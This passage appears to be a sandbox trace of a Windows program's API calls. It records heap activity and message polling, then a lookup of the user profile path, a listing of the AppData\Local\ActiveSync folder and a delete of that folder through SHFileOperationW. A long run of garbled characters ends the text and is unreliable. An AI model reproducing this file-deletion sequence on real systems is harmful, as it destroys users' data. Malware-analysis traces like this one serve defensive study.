(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0152.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0152.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0152.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0152.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0152.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.615] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.615] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.615] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.615] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.615] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.615] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.615] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.615] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.615] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.615] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.615] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.616] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.616] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.616] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.616] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.616] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.616] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.616] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.616] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.616] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.616] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.616] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0152.617] CryptReleaseContext (hProv=0x9be9a0, dwFlags=0x0) returned 1 [0152.617] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.617] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.617] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.617] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.617] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.617] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.617] FreeLibrary (hLibModule=0x76390000) returned 1 [0152.617] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.617] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.617] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.617] CloseHandle (hObject=0x4f8) returned 1 [0152.618] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.618] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.618] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.618] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.618] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/ActiveSync", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpFilePart=0x8cedf4*="ActiveSync") returned 0x28 [0152.618] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\activesync")) returned 0x10 [0152.618] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e20b8 [0152.618] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0152.619] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 0 [0152.619] FindClose (in: hFindFile=0x9e20b8 | out: hFindFile=0x9e20b8) returned 1 [0152.619] GetLastError () returned 0x12 [0152.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0152.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.619] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0152.619] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa348 [0152.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa528 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0152.620] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a683a8 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0152.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0152.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0152.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0152.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0152.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0152.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0152.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0152.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0152.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0152.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fae0 [0152.621] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/ActiveSync", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpFilePart=0x8cf650*="ActiveSync") returned 0x28 [0152.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fae0 | out: hHeap=0x2af0000) returned 1 [0152.621] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\activesync")) returned 0x10 [0152.621] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌